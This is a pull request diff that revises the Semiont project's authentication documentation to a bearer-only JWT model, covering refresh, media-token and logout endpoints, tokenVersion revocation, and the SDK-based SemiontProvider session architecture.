### PR TITLE
Reconcile documentation to the bearer-only auth model (#890 follow-up)

### DIFF
--- a/apps/backend/README.md
+++ b/apps/backend/README.md
@@ -223,9 +223,9 @@ See [Authentication Guide](./docs/AUTHENTICATION.md) for implementation details.
 ### API Routing Architecture
 
 Clean separation of concerns:
-- **Backend owns**: `/api/*` - All API endpoints
-- **Frontend owns**: `/auth/*` - NextAuth.js OAuth flows
-- **No routing conflicts** - Simple ALB 3-rule pattern
+- **Backend owns**: `/api/*` - all API endpoints, including the OAuth credential exchange and JWT minting (`POST /api/tokens/google`)
+- **Frontend**: the static Vite + React SPA - no server routes (#557 removed Next.js)
+- **No routing conflicts** - simple ALB host/path rules
 
 See [API Reference](../../docs/protocol/API.md) for complete endpoint documentation.
 

--- a/apps/backend/docs/AUTHENTICATION.md
+++ b/apps/backend/docs/AUTHENTICATION.md
@@ -3,12 +3,12 @@
 Backend developer's guide to implementing and debugging authentication in the Semiont backend.
 
 **Related Documentation:**
-- **[System Authentication Architecture](../../../docs/system/administration/AUTHENTICATION.md)** - **Read this first!** Complete authentication flows, diagrams, NextAuth.js + backend integration, and MCP implementation
+- **[System Authentication Architecture](../../../docs/system/administration/AUTHENTICATION.md)** - **Read this first!** The complete bearer-only authentication model, flows, and diagrams
 - [Main README](../README.md) - Backend overview
 - [API Reference](../../../docs/protocol/API.md) - API endpoints
 - [Development Guide](./DEVELOPMENT.md) - Local setup
 
-**Scope**: This document is a practical guide for backend developers. For the complete authentication architecture, flow diagrams, and frontend integration, see the [System Authentication Architecture](../../../docs/system/administration/AUTHENTICATION.md).
+**Scope**: This document is a practical guide for backend developers. For the complete authentication architecture and flow diagrams, see the [System Authentication Architecture](../../../docs/system/administration/AUTHENTICATION.md).
 
 ## Quick Reference
 
@@ -47,7 +47,7 @@ These endpoints are documented in the OpenAPI spec as public (no `security` fiel
 - `GET /api/health` - Health check for load balancer monitoring
 - `POST /api/tokens/password` - Password authentication
 - `POST /api/tokens/google` - Google OAuth authentication
-- `POST /api/tokens/refresh` - Refresh token exchange for MCP clients
+- `POST /api/tokens/refresh` - Exchange a refresh token for a new access token (driven by the SDK `Session`)
 
 All other routes require JWT authentication via router-level middleware.
 
@@ -169,11 +169,12 @@ curl -H "Authorization: Bearer eyJhbGc..." \
 ### 2. Automatic Validation
 
 The auth middleware automatically:
-- Extracts token from Authorization header
-- Verifies JWT signature
+- Extracts the token from the `Authorization: Bearer` header (or the `?token=` media token on `GET /api/resources/:id`)
+- Verifies the JWT signature
 - Checks token expiration
-- Validates user exists in database
-- Attaches user to request context
+- Loads the user from the database and confirms they are active
+- Enforces revocation: rejects the token when `payload.tokenVersion !== user.tokenVersion` (a logout bump invalidates every live token)
+- Attaches the user to the request context
 
 ### 3. Route Access
 
@@ -187,69 +188,90 @@ app.get('/api/documents', async (c) => {
 });
 ```
 
-## MCP Authentication Endpoints
+## Token & Session Endpoints
 
-Special backend endpoints for Model Context Protocol clients. For complete MCP flow, see [System Authentication](../../../docs/system/administration/AUTHENTICATION.md#mcp-authentication).
-
-### `POST /api/tokens/mcp-generate`
-
-Generate a 30-day refresh token for MCP clients.
-
-- **Auth**: Requires valid JWT access token
-- **Called by**: Frontend's `/auth/mcp-setup` endpoint
-- **Returns**: `{ refreshToken: string, expiresIn: number }`
+Backend-specific endpoints beyond the public login routes (`/api/tokens/password`,
+`/api/tokens/google`). Align behavior to the canonical
+[System Authentication](../../../docs/system/administration/AUTHENTICATION.md).
 
 ### `POST /api/tokens/refresh`
 
-Exchange refresh token for new access token.
+Exchange a 30-day refresh token for a new 10-minute access token. This is the path
+the SDK `Session` drives to keep a client signed in without re-prompting.
 
-- **Auth**: Public (accepts refresh token in body)
-- **Used by**: MCP clients every hour
-- **Returns**: `{ accessToken: string, expiresIn: number }`
-
-### MCP Backend Usage Example
+- **Auth**: Public (the refresh token is supplied in the request body)
+- **Revocation-aware**: rejected if the token's `tokenVersion` is behind the user's current value (see logout)
+- **Returns**: `{ access_token: string }`
 
 ```typescript
-// MCP client exchanges refresh token
+// The SDK Session exchanges a refresh token for a fresh access token
 const response = await fetch('https://api.semiont.com/api/tokens/refresh', {
   method: 'POST',
   headers: { 'Content-Type': 'application/json' },
   body: JSON.stringify({ refreshToken })
 });
+const { access_token } = await response.json();
 
-const { accessToken } = await response.json();
-
-// Use access token for API requests
+// Use the access token for API requests
 const documents = await fetch('https://api.semiont.com/api/documents', {
-  headers: { 'Authorization': `Bearer ${accessToken}` }
+  headers: { 'Authorization': `Bearer ${access_token}` }
 });
 ```
 
+### `POST /api/tokens/media`
+
+Mint a short-lived, resource-scoped **media token** for header-less fetches
+(`<img>`, `<iframe>`, PDF.js) that can't send an `Authorization` header.
+
+- **Auth**: Requires a valid access token
+- **Body**: `{ resourceId: string }`
+- **Returns**: `{ token: string }` — a 5-minute token scoped to that one resource,
+  presented as `GET /api/resources/:id?token=…` and verified by the auth
+  middleware's media path
+
+### `POST /api/users/logout`
+
+Revoke the caller's sessions. Increments the user's `tokenVersion`, which instantly
+invalidates the 30-day refresh token **and** every live access token on its next
+request — server-side, all devices.
+
+- **Auth**: Requires a valid access token
+- **Returns**: `204 No Content`
+
+> **MCP clients.** The previous browser-mediated MCP token-provisioning flow has been
+> **removed**. Today `packages/mcp-server` runs single-backend with a **static**
+> `SEMIONT_ACCESS_TOKEN` (from env) that does **not** refresh — so it stops working at the
+> 10-minute access-token TTL, or when a logout bumps `tokenVersion`. A refreshing
+> provisioning flow is being rebuilt; this guide will document it once it lands.
+
 ## JWT Token Structure
 
-### Access Token (7-day expiration)
+Access and refresh tokens carry the **same claim set** (validated by
+`JWTPayloadSchema` in [src/types/jwt-types.ts](../src/types/jwt-types.ts)); they
+differ only in lifetime. Every token carries the user's `tokenVersion` at mint
+time — the middleware rejects it once the stored `tokenVersion` moves ahead (see
+logout, above). Software-agent tokens additionally carry an `agentDid`.
+
+### Access Token (10-minute expiration)
 
 ```json
 {
-  "sub": "user-123",
+  "userId": "clx0a1b2c3d4e5f6g7h8i9j0k",
   "email": "user@example.com",
+  "domain": "example.com",
+  "provider": "google",
   "isAdmin": false,
-  "isModerator": false,
+  "tokenVersion": 0,
   "iat": 1698765432,
-  "exp": 1699370232
+  "exp": 1698766032
 }
 ```
 
-### Refresh Token (30-day expiration, MCP only)
+### Refresh Token (30-day expiration)
 
-```json
-{
-  "sub": "user-123",
-  "type": "refresh",
-  "iat": 1698765432,
-  "exp": 1701357432
-}
-```
+Held by the SDK `Session`, which exchanges it for fresh access tokens via
+`POST /api/tokens/refresh`. Same claims as the access token (including
+`tokenVersion`, so a logout revokes it) — only `exp` differs.
 
 ## Security Implementation
 
@@ -270,7 +292,7 @@ The backend validates tokens through multiple layers:
 - **Environment validation** - JWT_SECRET must be 32+ characters
 - **Request validation** - All inputs validated with Zod schemas
 - **SQL injection prevention** - Prisma ORM with parameterized queries
-- **CORS configuration** - Frontend domain whitelist
+- **CORS** - open (`origin: '*'`, no credentials); safe because auth is bearer-only, not cookie-based
 - **Domain restrictions** - OAuth limited to allowed domains
 
 ### Security Test Coverage
@@ -319,11 +341,11 @@ DEBUG=hono:*
 LOG_LEVEL=debug
 ```
 
-**MCP Token Exchange Fails**:
+**Refresh Token Exchange Fails**:
 
-- Check refresh token hasn't expired (30 days)
-- Verify `/api/auth/refresh` endpoint is accessible
-- Ensure refresh token is correctly transmitted in body
+- Check the refresh token hasn't expired (30 days) or been revoked by a logout (`tokenVersion` bump)
+- Verify the `POST /api/tokens/refresh` endpoint is accessible
+- Ensure the refresh token is sent as `{ "refreshToken": "…" }` in the body
 
 ### Backend Debugging Tools
 
@@ -363,7 +385,6 @@ app.get('/api/debug/whoami', async (c) => {
 ## Implementation Reference
 
 For complete implementation details including:
-- Frontend NextAuth.js configuration
 - Complete authentication flow diagrams
 - OAuth provider setup
 - Environment variable configuration
@@ -395,5 +416,5 @@ See [System Authentication Architecture](../../../docs/system/administration/AUT
 
 ---
 
-**Last Updated**: 2026-03-15
+**Last Updated**: 2026-06-20
 **Scope**: Backend authentication implementation and debugging

--- a/apps/backend/src/routes/auth.ts
+++ b/apps/backend/src/routes/auth.ts
@@ -114,7 +114,7 @@ authRouter.post('/api/tokens/password',
 
       getRouteLogger().debug('Password auth successful', { email });
 
-      // Generate access (1h) and refresh (30d) tokens
+      // Generate access (10m) and refresh (30d) tokens
       const jwtPayload: Omit<ValidatedJWTPayload, 'iat' | 'exp'> = {
         userId: makeUserId(user.id),
         email: makeEmail(user.email),
@@ -267,7 +267,7 @@ authRouter.post('/api/tokens/refresh',
         return c.json({ error: 'Token revoked' }, 401);
       }
 
-      // Generate new short-lived access token (1 hour)
+      // Generate new short-lived access token (10 minutes)
       const accessTokenPayload: Omit<ValidatedJWTPayload, 'iat' | 'exp'> = {
         userId: makeUserId(user.id),
         email: makeEmail(user.email),

--- a/apps/cli/docs/ADDING_ENVIRONMENTS.md
+++ b/apps/cli/docs/ADDING_ENVIRONMENTS.md
@@ -17,7 +17,6 @@ Add a new `[environments.<name>.*]` set of sections to `~/.semiontconfig`:
 port = 3001
 publicURL = "https://api.staging.example.com"
 frontendURL = "https://staging.example.com"
-corsOrigin = "https://staging.example.com"
 
 [environments.staging.site]
 domain = "staging.example.com"
@@ -59,7 +58,7 @@ Each environment can include:
 
 | Section | Purpose |
 |---|---|
-| `[environments.<env>.backend]` | Backend port, public URL, CORS origin |
+| `[environments.<env>.backend]` | Backend port, public URL |
 | `[environments.<env>.site]` | Domain, OAuth allowed domains, site name |
 | `[environments.<env>.database]` | PostgreSQL connection settings |
 | `[environments.<env>.make-meaning.graph]` | Graph database (memory, neo4j) |

--- a/apps/cli/docs/ARCHITECTURE.md
+++ b/apps/cli/docs/ARCHITECTURE.md
@@ -620,7 +620,6 @@ environment = "local"
 [environments.local.backend]
 port = 3001
 publicURL = "http://localhost:3001"
-corsOrigin = "http://localhost:3000"
 
 [environments.local.database]
 host = "localhost"

--- a/apps/frontend/docs/API-INTEGRATION.md
+++ b/apps/frontend/docs/API-INTEGRATION.md
@@ -1,9 +1,10 @@
 # API Integration Guide
 
 How the Semiont frontend integrates with the backend through the
-framework-agnostic `@semiont/react-ui` library and the `@semiont/http-transport`
-package — including the provider pattern, bus gateway transport, and
-W3C annotation model.
+framework-agnostic `@semiont/react-ui` library, the `@semiont/sdk` client
+(`SemiontClient`, sessions, the namespace verb API), and the
+`@semiont/http-transport` wire adapter — including the provider model, bus
+gateway transport, and W3C annotation model.
 
 ## Overview
 
@@ -25,21 +26,32 @@ that maintains framework independence:
 │    packages/react-ui                │
 │  (Framework-agnostic library)       │
 │                                     │
-│  • ApiClientProvider                │
-│  • AuthTokenProvider                │
+│  • SemiontProvider — the single     │
+│    React bridge to SemiontBrowser   │
 │  • Flow state units (RxJS)          │
 │  • UI components & hooks            │
 └─────────────┬───────────────────────┘
               │ uses
               ▼
 ┌─────────────────────────────────────┐
-│    packages/http-transport              │
-│  (Type-safe API client)             │
+│    packages/sdk                     │
+│  (SemiontClient + sessions)         │
+│                                     │
+│  • SemiontBrowser / SemiontSession  │
+│  • Namespace verb API               │
+│    (browse, mark, yield, …)         │
+│  • Bus gateway (single SSE)         │
+└─────────────┬───────────────────────┘
+              │ uses
+              ▼
+┌─────────────────────────────────────┐
+│    packages/http-transport          │
+│  (Wire adapter)                     │
 │                                     │
 │  • OpenAPI-generated types          │
-│  • Namespace verb API               │
-│  • Bus gateway (single SSE)         │
-│  • HTTP for binary + auth           │
+│  • HttpTransport (HTTP + bus)       │
+│  • Binary + media-token auth        │
+│  • APIError                         │
 └─────────────────────────────────────┘
 ```
 
@@ -47,58 +59,83 @@ All API interactions feature:
 
 - **Type-safety** — TypeScript types generated from the OpenAPI spec
 - **Framework-agnostic react-ui** — plugs into any React framework via providers
-- **Observable auth** — `token$: BehaviorSubject<AccessToken | null>` reactively drives bus auth
-- **One bus connection** — `SemiontApiClient` maintains a single SSE subscription to `/bus/subscribe`
+- **In-memory bearer auth** — the per-KB `SemiontSession` holds the access token in JS memory and feeds the client's `token$`; no cookies, no ambient credentials
+- **One bus connection** — `SemiontClient` maintains a single SSE subscription to `/bus/subscribe`
 - **Structured errors** — consistent error shape from the backend, surfaced through `APIError`
 
-## Provider Pattern Architecture
+## Provider Model
 
-The Provider Pattern lets `@semiont/react-ui` run in any React framework
-by abstracting framework-specific pieces (session, token source, routing)
-behind a small set of context providers.
+`@semiont/react-ui` stays framework-neutral by keeping all session and client
+logic in `@semiont/sdk` — pure RxJS classes with no React inside — and exposing
+exactly **one** React bridge: `SemiontProvider`.
 
-### How It Works
+### How it works
 
-1. `@semiont/react-ui` exposes providers that take a minimal, framework-neutral shape (e.g. `AuthTokenProvider` takes `token: string | null`).
-2. The frontend mounts those providers with values sourced from its own auth system.
-3. Components inside read from the providers via hooks — they never touch the framework directly.
+`SemiontProvider` puts the module-scoped `SemiontBrowser` singleton into React
+context; `useSemiont()` hands it back. The browser owns everything
+session-related (the KB list, the active KB, and the per-KB `SemiontSession`),
+lives outside React, and survives every re-render and route change. There is
+**no** stack of token/client providers — a component reads the active client
+through the browser's observables:
 
-This boundary lets the same library power a Vite app, a Next.js app, or
-a mobile shell without code changes to the components.
+```tsx
+import { useSemiont, useObservable } from '@semiont/react-ui';
 
-### Provider Stack
-
-For an authenticated area of the app the provider stack looks like:
-
-```
-EventBusProvider
-  └── AuthTokenProvider (token: string | null from your auth system)
-       └── ApiClientProvider (baseUrl, tokenRefresher?)
-            └── your components
+function useClient() {
+  // null until a session is active for the current KB
+  return useObservable(useSemiont().activeSession$)?.client;
+}
 ```
 
-`ApiClientProvider` reads the `BehaviorSubject` from `AuthTokenContext`
-and passes it to `SemiontApiClient` as `token$`. The client uses
-`token$.getValue()` on every request and subscribes to it to start its
-bus actor the first time a real token arrives.
+The app mounts the provider once at the root (see
+`apps/frontend/src/app/providers.tsx`):
 
-**Reference implementation**: see
+```tsx
+<TranslationProvider …>
+  <SemiontProvider>
+    {/* Toast, LiveRegion, KeyboardShortcuts, Theme, then the app */}
+  </SemiontProvider>
+</TranslationProvider>
+```
+
+Most components never read the client directly — dedicated hooks
+(`useMediaToken`, `useResourceContent`, the flow state units) encapsulate the
+`activeSession$ → client` read.
+
+**Reference**: see
 [`packages/react-ui/docs/SESSION.md`](../../../packages/react-ui/docs/SESSION.md)
-for the exact provider API. See
+for the session/provider API and
 [`packages/sdk/docs/Usage.md`](../../../packages/sdk/docs/Usage.md)
-for how the client consumes `token$`.
+for the client and bus subscription.
 
 ## Authentication Flow
 
-A user is always authenticated against a specific Knowledge Base.
-`KnowledgeBaseSessionProvider` (mounted via `AuthShell` in protected
-layouts) owns the active KB, the per-KB JWT in localStorage, and the
-validated session.
+A user is always authenticated against a specific Knowledge Base; there is
+**no global session**. The `SemiontBrowser` singleton holds:
+
+- `kbs$` — the known Knowledge Bases
+- `activeKbId$` — which one is active
+- `activeSession$` — the active KB's `SemiontSession` (or `null` when signed out)
+- `activeSignals$` — that session's session-expired / permission-denied signals
+
+Switching KBs swaps `activeSession$` atomically. Each `SemiontSession` owns its
+own `SemiontClient` and the per-KB **bearer token in JS memory** — a 10-minute
+access token re-minted from a 30-day refresh token. Bearer-only: no cookie, no
+ambient credential.
+
+- **Sign in** — `SemiontSession.signInHttp({ … })` exchanges credentials for the
+  JWT (returned in the response body) and activates the session.
+- **Sign out** — `browser.signOut(kbId)` calls the backend logout, which bumps
+  the user's `tokenVersion` — revoking the refresh token and every live access
+  token **server-side, on all devices** — and clears `activeSession$`.
+
+Protected layouts mount `AuthShell`, which mounts the protected error boundary
+and the two auth-failure modals; the modals read the active session's signals
+(`activeSignals$`):
 
 ```tsx
 // apps/frontend/src/contexts/AuthShell.tsx
 import {
-  KnowledgeBaseSessionProvider,
   ProtectedErrorBoundary,
   SessionExpiredModal,
   PermissionDeniedModal,
@@ -106,42 +143,35 @@ import {
 
 export function AuthShell({ children }) {
   return (
-    <KnowledgeBaseSessionProvider>
-      <ProtectedErrorBoundary>
-        <SessionExpiredModal />
-        <PermissionDeniedModal />
-        {children}
-      </ProtectedErrorBoundary>
-    </KnowledgeBaseSessionProvider>
+    <ProtectedErrorBoundary>
+      <SessionExpiredModal />
+      <PermissionDeniedModal />
+      {children}
+    </ProtectedErrorBoundary>
   );
 }
 ```
 
-Components inside the shell read session state with `useKnowledgeBaseSession()`:
+Components read auth state by subscribing to the browser's observables — a
+`null` `activeSession$` means the user isn't signed into the active KB:
 
 ```tsx
-import { useKnowledgeBaseSession } from '@semiont/react-ui';
+import { useSemiont, useObservable } from '@semiont/react-ui';
 
 function UserBadge() {
-  const { isAuthenticated, displayName, signOut, activeKnowledgeBase } =
-    useKnowledgeBaseSession();
-  if (!isAuthenticated || !activeKnowledgeBase) return null;
-  return (
-    <button onClick={() => signOut(activeKnowledgeBase.id)}>
-      {displayName} (Sign out)
-    </button>
-  );
+  const browser = useSemiont();
+  const session = useObservable(browser.activeSession$);
+  const activeKbId = useObservable(browser.activeKbId$);
+  if (!session || !activeKbId) return null;
+  return <button onClick={() => browser.signOut(activeKbId)}>Sign out</button>;
 }
 ```
-
-The hook throws if called outside the provider — there is no fallback.
-Auth-aware components must always be inside the protected boundary.
 
 **Key points:**
 
 - **Per-KB sessions** — there is no global session; switching KBs switches sessions atomically.
-- **No manual token management** — the session provider handles storage; the http-transport reads the token observably.
-- **Type-safe** — types flow from the OpenAPI spec through the http-transport to components.
+- **No manual token management** — the `SemiontSession` mints and refreshes the bearer token in memory; the client reads it observably.
+- **Type-safe** — types flow from the OpenAPI spec through the transport to components.
 
 ## Bus Gateway Transport
 
@@ -282,8 +312,8 @@ like `browse:resources-failed`), raised from the promise returned by
 
 ### Automatic Recovery
 
-- **401 errors** — if `ApiClientProvider` is given a `tokenRefresher`, the client retries once with a fresh token before propagating the error.
-- **Session expired** — `KnowledgeBaseSessionProvider` detects expiry and surfaces `SessionExpiredModal`.
+- **401 errors** — the `SemiontSession` re-mints a fresh access token from the refresh token and retries once before propagating the error.
+- **Session expired** — when the refresh token is gone or revoked, the active session's signals surface `SessionExpiredModal`.
 - **Permission denied** — surfaced via `PermissionDeniedModal`.
 
 ## Related Documentation

--- a/apps/frontend/docs/ARCHITECTURE.md
+++ b/apps/frontend/docs/ARCHITECTURE.md
@@ -21,7 +21,7 @@ The Semiont frontend is a Vite + React Router v7 SPA. The architecture emphasize
 
 - **Type Safety**: TypeScript throughout with strict mode enabled
 - **Server State Management**: React Query for all API interactions
-- **Authentication**: JWT cookie managed entirely by the backend — no frontend auth server
+- **Authentication**: bearer-only — the SDK session holds the JWT in memory and sends `Authorization: Bearer`; no cookie, no frontend auth server
 - **No Global Mutable State**: All state is managed through React hooks and contexts
 - **Fail-Fast Philosophy**: No default values - explicit configuration required
 
@@ -82,25 +82,21 @@ The frontend leverages **@semiont/react-ui**, a comprehensive framework-agnostic
 - **Form Hooks**: useFormValidation with built-in validation rules
 
 #### Provider Pattern
-@semiont/react-ui uses a provider pattern with two layers — global (every page) and protected (only routes that require auth):
+@semiont/react-ui uses a two-layer provider model — global (every page) and protected (only routes that require auth):
 
 ```tsx
-// Global layer — auth-independent
+// Global layer — auth-independent (apps/frontend/src/app/providers.tsx)
 <TranslationProvider translationManager={i18nextManager}>
-  <QueryClientProvider client={queryClient}>
-    <ApiClientProvider baseUrl={apiBaseUrl}>
-      {/* App components can now use translation/query/api hooks */}
+  <SemiontProvider>            {/* the SemiontBrowser singleton: sessions, KBs, the client */}
+    {/* Toast, LiveRegion, KeyboardShortcuts, Theme, then the app */}
 
-      {/* Protected layer — only inside layouts that require auth */}
-      <KnowledgeBaseSessionProvider>
-        <ProtectedErrorBoundary>
-          <SessionExpiredModal />
-          <PermissionDeniedModal />
-          {/* Auth-aware components live here */}
-        </ProtectedErrorBoundary>
-      </KnowledgeBaseSessionProvider>
-    </ApiClientProvider>
-  </QueryClientProvider>
+    {/* Protected layer — AuthShell, mounted only inside layouts that require auth */}
+    <ProtectedErrorBoundary>
+      <SessionExpiredModal />
+      <PermissionDeniedModal />
+      {/* Auth-aware components live here */}
+    </ProtectedErrorBoundary>
+  </SemiontProvider>
 </TranslationProvider>
 ```
 
@@ -157,79 +153,51 @@ See [AUTHENTICATION.md](./AUTHENTICATION.md) for the full authentication flow.
 
 **Session Management:**
 ```
-KnowledgeBaseSessionProvider (mounted by AuthShell, library-side)
-    ├── owns: KB list, active KB id, per-KB JWTs in localStorage
-    ├── owns: validated session for active KB (token + user)
-    ├── owns: sessionExpiredAt / permissionDeniedAt modal flags
-    └── useKnowledgeBaseSession() hook (throws if outside provider)
+SemiontProvider (app root) → SemiontBrowser singleton (library-side, outside React)
+    ├── owns: kbs$ (KB list), activeKbId$ (active KB) — persisted via the storage adapter
+    ├── owns: activeSession$ — the active KB's SemiontSession (its SemiontClient + access/refresh tokens)
+    ├── owns: activeSignals$ — session-expired / permission-denied modal signals
+    ├── owns: openResources$, identityToken$
+    └── useSemiont() → SemiontBrowser   (components read observables via useObservable)
         └── Application Components
 ```
 
 **Authentication Flow:**
-1. User adds a KB and submits credentials → frontend POSTs to that KB's backend → backend returns a JWT
-2. Provider stores token in `localStorage` and sets the new KB active
-3. On mount/switch the provider validates the stored token via `getMe`
-4. 401 from validation OR from any React Query call → provider sets `sessionExpiredAt` → `SessionExpiredModal` surfaces
+1. User adds a KB and submits credentials → `SemiontSession.signInHttp` POSTs to that KB's backend → backend returns access + refresh tokens in the response body
+2. The browser activates the session (`activeSession$`), marks the KB active (`activeKbId$`), and persists the session via the storage adapter
+3. On reload/switch the browser restores the stored session; the client uses its in-memory access token, re-minting from the refresh token as it nears the 10-minute expiry
+4. A 401 that can't be refreshed → the session's signals set the expiry flag → `SessionExpiredModal` surfaces
 
 **Token Management:**
-- One JWT per KB in `localStorage` (`semiont.token.<kbId>`)
-- The provider exposes mutations (`addKnowledgeBase`, `signIn`, `signOut`) so consumers never touch storage directly
-- `useKnowledgeBaseSession()` exposes coarse derived auth fields (`isAuthenticated`, `isAdmin`, `displayName`, etc.) memoized off `session.user`
+- Bearer-only: every request carries `Authorization: Bearer <jwt>` — there is no cookie and no ambient credential
+- The per-KB session (10-minute access token + 30-day refresh token) is held in memory and persisted per-KB via the storage adapter (localStorage on web), so it survives reload
+- The browser exposes mutations (`addKnowledgeBase`, `signIn`, `signOut`); `signOut(kbId)` calls the backend logout, bumping `tokenVersion` to revoke the refresh token and all live access tokens server-side (all devices)
 
 ### Authentication Hooks
 
 ```typescript
-import { useKnowledgeBaseSession } from '@semiont/react-ui';
+import { useSemiont, useObservable } from '@semiont/react-ui';
 
-// Get authentication state and mutations
-const {
-  isAuthenticated,
-  isAdmin,
-  isModerator,
-  displayName,
-  token,
-  activeKnowledgeBase,
-  signOut,
-} = useKnowledgeBaseSession();
+// The browser singleton and its observable session state
+const browser = useSemiont();
+const session = useObservable(browser.activeSession$);   // null when signed out
+const activeKbId = useObservable(browser.activeKbId$);
 
-// API calls use @semiont/http-transport; the AuthTokenProvider in protected
-// layouts wires the active KB's token into outgoing requests automatically.
-const apiClient = useApiClient();
-const data = await apiClient.getDocument(id);
+// The SemiontClient lives on the active session; namespace verbs hang off it.
+// The session feeds the client its in-memory bearer token automatically.
+const resource = await session?.client.browse.resource(id);
+
+// Mutations go through the browser:
+await browser.signOut(activeKbId!);
 ```
 
 ## State Management
-
-### Server State (React Query)
-
-All server data is managed through React Query hooks generated from the API client.
-
-**Queries (Read Operations):**
-```typescript
-// Fetch data with automatic caching and refetching
-const { data, isLoading, error } = api.documents.get.useQuery(documentId);
-```
-
-**Mutations (Write Operations):**
-```typescript
-// Create/update/delete with automatic cache invalidation
-const updateMutation = api.documents.update.useMutation();
-await updateMutation.mutateAsync({ id, title, content });
-```
-
-**Benefits:**
-- Automatic caching (5 minute stale time)
-- Background refetching
-- Request deduplication
-- Optimistic updates
-- Error handling with retry logic
-- No manual state management needed
 
 ### Observable Stores (RxJS BehaviorSubject)
 
 High-churn entity data and browser-persistent application state are managed as observable stores — `BehaviorSubject`-backed classes with no React dependency. Components subscribe via `useObservable(store.observable$)`.
 
-**Verb namespace Observables** (live in `@semiont/http-transport`, owned by `SemiontApiClient`):
+**Verb namespace Observables** (live in `@semiont/sdk`, owned by `SemiontClient`):
 
 | Namespace | Access | What it caches |
 |---|---|---|
@@ -237,7 +205,7 @@ High-churn entity data and browser-persistent application state are managed as o
 | Browse | `semiont.browse.annotations(id)` | Annotation lists per resource, updated in-place by enriched SSE events |
 | Browse | `semiont.browse.entityTypes()` | Entity types, updated via `frame:entity-type-added` bus channel |
 
-These update automatically when backend domain events arrive through the bus gateway (`mark:added`, `yield:updated`, etc.) — no manual `invalidateQueries` calls needed. Components subscribe via `useObservable(semiont.browse.annotations(resourceId))`. See [`@semiont/http-transport` README](../../../packages/http-transport/README.md) for the full verb namespace API.
+These update automatically when backend domain events arrive through the bus gateway (`mark:added`, `yield:updated`, etc.) — no manual cache-invalidation calls needed. Components subscribe via `useObservable(semiont.browse.annotations(resourceId))`. See [`@semiont/sdk` Usage.md](../../../packages/sdk/docs/Usage.md) for the full verb namespace API.
 
 **Application state stores** (live in `apps/frontend/src/stores/`, browser-coupled):
 
@@ -248,7 +216,7 @@ These update automatically when backend domain events arrive through the bus gat
 
 These stores depend on browser APIs (`localStorage`, `window`) and so cannot live in the framework-agnostic `http-transport` package.
 
-**React integration**: `AuthTokenProvider` holds the current token in a `BehaviorSubject`, and `ApiClientProvider` passes that subject to `SemiontApiClient` as `token$`. The client reads the observable's current value on every request; token changes propagate automatically without any React-specific wiring.
+**React integration**: `SemiontProvider` exposes the `SemiontBrowser` singleton via `useSemiont()`. Each per-KB `SemiontSession` owns its `SemiontClient` and feeds it the in-memory bearer token as `token$`; the client reads the observable's current value on every request, so token refreshes propagate automatically without any React-specific wiring.
 
 ### Binary Content (Media Tokens)
 
@@ -279,13 +247,9 @@ See [`@semiont/http-transport/docs/MEDIA-TOKENS.md`](../../../packages/http-tran
 UI-only state and framework-agnostic providers:
 
 **Framework-Agnostic Providers** (from `@semiont/react-ui`):
-- `AnnotationProvider` - Injects `AnnotationManager` for annotation mutations
-- `CacheProvider` - Injects `CacheManager` for cache invalidation
-- `AnnotationUIProvider` - UI-only state for sparkle animations (`newAnnotationIds`)
+- `SemiontProvider` - Puts the `SemiontBrowser` singleton (KB list, active KB, per-KB `SemiontSession` + its `SemiontClient`, open resources) into context; read via `useSemiont()`
 - `TranslationProvider` - Injects `TranslationManager` for i18n
-- `ApiClientProvider` - Injects `ApiClientManager` for API access
-- `KnowledgeBaseSessionProvider` - Owns KB list, active KB, validated session (mounted only inside the protected layout boundary)
-- `OpenResourcesProvider` - Injects `OpenResourcesManager` for routing
+- `AnnotationProvider` - Injects `AnnotationManager` for annotation mutations
 
 These providers are framework-independent and can work with Next.js, Vite, or any React framework. The app provides framework-specific manager implementations.
 
@@ -466,7 +430,7 @@ User action (e.g., click save)
 ### Real-Time Updates (Bus Gateway)
 
 ```
-SemiontApiClient creates one ActorStateUnit (single SSE to /bus/subscribe)
+SemiontClient creates one ActorStateUnit (single SSE to /bus/subscribe)
     └── ResourceViewerPage mounts and subscribes to browse.*(id) live queries
         └── observing them acquires the resource scope (adds scoped channels; #847)
             └── Backend emits domain events on scoped bus
@@ -520,10 +484,9 @@ The provider tree has two distinct layers:
 
 ### Why the split
 
-- **Pre-app surfaces** (landing page, OAuth flow, static pages) do not need to validate JWTs and should not surface auth-failure modals.
-- **Protected layouts** validate the active KB's JWT on mount via `getMe`. A 401 from that call sets `sessionExpiredAt` on the context, which `SessionExpiredModal` reads and surfaces.
-- **`KnowledgeBaseSessionProvider` re-validates internally when the active KB changes** so switching KBs forces a fresh validation against the new backend — no external bridge component needed.
-- **Protected layouts mount their own `ApiClientProvider`** pointing at the active KB's backend URL — they read the URL from `useKnowledgeBaseSession().activeKnowledgeBase`.
+- **Pre-app surfaces** (landing page, OAuth flow, static pages) do not need a validated session and should not surface auth-failure modals.
+- **Protected layouts** mount `AuthShell`, which surfaces the auth-failure modals from the active session's signals (`activeSignals$`). A 401 that can't be refreshed marks the session expired and `SessionExpiredModal` surfaces.
+- **Switching KBs swaps `activeSession$`** to the new KB's session (with its own `SemiontClient` pointing at that KB's backend) — the `SemiontBrowser` singleton handles it, with no per-layout provider or external bridge.
 
 See [`@semiont/react-ui/docs/SESSION.md`](../../../packages/react-ui/docs/SESSION.md) for details on the Provider Pattern architecture.
 

--- a/apps/frontend/docs/ARCHITECTURE.md
+++ b/apps/frontend/docs/ARCHITECTURE.md
@@ -497,50 +497,29 @@ See [`@semiont/react-ui/docs/`](../../../packages/react-ui/docs/) for documentat
 The `@semiont/react-ui` library uses the **Provider Pattern** to remain framework-agnostic:
 
 ```typescript
-// @semiont/react-ui defines INTERFACES
+// @semiont/react-ui defines the INTERFACE
 interface AnnotationManager {
   createAnnotation: (params: CreateAnnotationParams) => Promise<Annotation | undefined>;
   deleteAnnotation: (params: DeleteAnnotationParams) => Promise<void>;
 }
 
-interface CacheManager {
-  invalidateAnnotations: (rId: ResourceId) => void | Promise<void>;
-  invalidateEvents: (rId: ResourceId) => void | Promise<void>;
-}
-
-// Apps provide IMPLEMENTATIONS
+// Apps provide an IMPLEMENTATION backed by the SDK client
 const annotationManager: AnnotationManager = {
-  createAnnotation: async (params) => {
-    const annotation = await client.createAnnotation(params);
-    queryClient.invalidateQueries(['annotations', params.rId]);
-    return annotation;
-  },
-  deleteAnnotation: async (params) => {
-    await client.deleteAnnotation(params);
-    queryClient.invalidateQueries(['annotations', params.rId]);
-  }
+  createAnnotation: (params) => semiont.mark.annotation(params),
+  deleteAnnotation: (params) => semiont.mark.delete(params.rId, params.aId),
 };
